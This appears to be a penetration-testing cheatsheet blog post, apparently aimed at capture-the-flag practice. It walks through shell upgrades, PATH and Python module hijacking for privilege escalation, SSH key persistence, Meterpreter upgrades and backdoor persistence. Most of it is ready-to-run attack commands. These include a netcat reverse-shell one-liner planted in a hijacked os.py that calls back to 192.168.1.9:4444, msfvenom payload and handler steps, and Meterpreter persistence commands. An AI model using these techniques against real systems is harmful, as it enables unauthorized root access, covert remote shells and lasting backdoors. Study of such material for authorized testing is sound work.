Pentest Cheatsheet

Cheatsheet

Last updated on 2020-08-06

Contents

This post is more like some techniques that could be useful.

For a guide to pentest each port click here!.

TTY Reverse Shell

Having an interactive shell is pretty important as our connection won’t hang up when doing Ctrl + C (because it doesn’t handle pretty well the SIGINT signal), allows us to autocomplete the commands and the routes, STDERR is displayed, we have command history…

To upgrade it:

# IN REMOTE COMPUTER
python -c 'import pty; pty.spawn("/bin/bash");'
# Or
python3 -c 'import pty; pty.spawn("/bin/bash");'
# Ctrl + Z
#   This is to put the terminal in foreground

# IN OUR COMPUTER
stty raw -echo # This allows passing through STDIN and STDOUT to the other terminal
fg # We recover the Reverse Shell session

# IN REMOTE COMPUTER
reset
# If it asks for terminal type use: xterm-256terminal
export TERMINAL=bash
export TERM=xterm-256color

And that’s how you get TTY.

Bypassing restricted shells via SSH:

A way to bypass the restricted shell is:

ssh <user>@<IP> bash

Invoking command bash via ssh gives us a ‘reverse shell’.

Path Hijacking

Sometimes when a file is executed as part of a routine (in a cron, a systemd, a daemon…) it might not run with the absolute path but with a relative one.

# Absolute Path
/bin/bash

# Relative Path
bash

Relative Path commands can be altered in such a way that we can modify the PATH variable to make the OS search bash command in our directory first (PATH is read in order from left to right). This way you can make that routine execute your command instead of the original one.

# PATH example
/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/snap/bin

This can be done with:

export PATH=$(pwd):$PATH

For example: In a server, in case there is a cron running fdisk as root, if you create a file called fdisk with a reverse shell (could be another thing), it will connect to you and get it with root access, as the script is being run by it.

Python modules Hijacking

This involves modifying or replacing a library that a Python script requires so that it executes our code.

Let’s say I have this script that is owned by another user:

#!/usr/bin/python

import os

print("Hello my friend!")

If somehow this script is running in a cronjob, we can trick it to execute our code as that other user.

How?

Taking into account this script is running by python and not python3 we need to search for /usr/lib/python2.7/os.py.

We can alter the behaviour of the script by:

Modifying the os library: If we have to write access over the file we can just simply put our code at the end.
Replacing the os library: We may not have write access over the file but over the folder. In that case, we just have to create a test.py, put our code at the end, and then replace the library:

mv test.py os.py

The code we can put at the end of the os library to execute another code could be:

import os
# HERE THE CODE
os.system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.9 4444 >/tmp/f")

Then when the script is ran by the cronjob, we would have a reverse shell!

An example of privilege escalation with this method is Friendzone HTB machine.

How to not loose a shell

If SSH is available we can copy our public key (usually in ~/.ssh/id_rsa.pub) to the server, more specifically to ~/.ssh/authorized_keys, doing so will let us SSH without the need of inputting a password or needing the private key.

To generate the keys in case we don’t have them, we run ssh-keygen and it will create them automatically.

Reverse Shell to Meterpreter

1º Way

We can upgrade a rev. shell to meterpreter uploading a msf meterpreter shell and running it:

msfvenom -p <PAYLOAD> RHOST=<IP> LPORT=<PORT> -f <FORMAT> > <FILE>.<EXTENSION>

A good reference for msfvenom use is this page.

Then we can upload it via an upload page the machine could have, curl, wget, netcat, scp, ftp, powershell… It’s up to you.

When we’ve uploaded it, it’s time to run it and listen on the port to get the meterpreter:

# ON MSFCONSOLE
use exploit/multi/handler
set LHOST <LISTENING IP>
set LPORT <LISTENING PORT>
set payload <PAYLOAD USED IN MSFVENOM>
run

And that should get us the met. shell.

2º Way

We can upload a another reverse but this time with payload ‘cmd’. When we get the connection with the cmd reverse shell:

#Putting the session on the background
background
#Upgrading cmd to meterpreter
sessions -u <ACTUAL CMD SESSION>
#After that, it should upgrade and get back to let us select between cmd or met.
#So we list the sessions to not fail.
sessions -l
#We select the one with description: meterpreter
sessions -i <MET. SESSION>

And there we are again!

Meterpreter on SSH

When having user and password it’s possible to manage ssh and upload files when wget or curl (for example) are restricted via a Metasploit Module or even with scp command:

# Login in msf
msfconsole
# Use the module
use auxiliary/scanner/ssh/ssh_login
# Set parameters
set rhosts <remote ip>
set username <user>
set password <pass>
# 💥
run

# After creating session, upgrade it!
sessions -u <session>

Backdoor

A backdoor is a remote persistant connection, what it means is that we can connect to the machine even when we disconnect or the pc reboots, it’ll’ always be waiting for a connection or throwing it to us. There are service backdoors, web shells…

Pupy.
Tennc - Webshells
xl7dev - Webshells
Bartblaze - PHP
Mattiasgeniar - PHP
Meterpreter: In Windows we can migrate the meterpreter to another process and then make it persistent by installing a service:

# IN METERPRETER
ps
# WE TAKE THE PID OF EXPLORER.EXE (WINDOWS)
migrate <PID>
run metsvc

Or we can run:

# IN METERPRETER
run persistance -A -L c:\\ -X SECS -p <OPEN PORT> -r <LHOST>
# Checks connection every SECS seconds

And now we have a service listening on us.

Backdoor Resources:

PayloadAllTheThings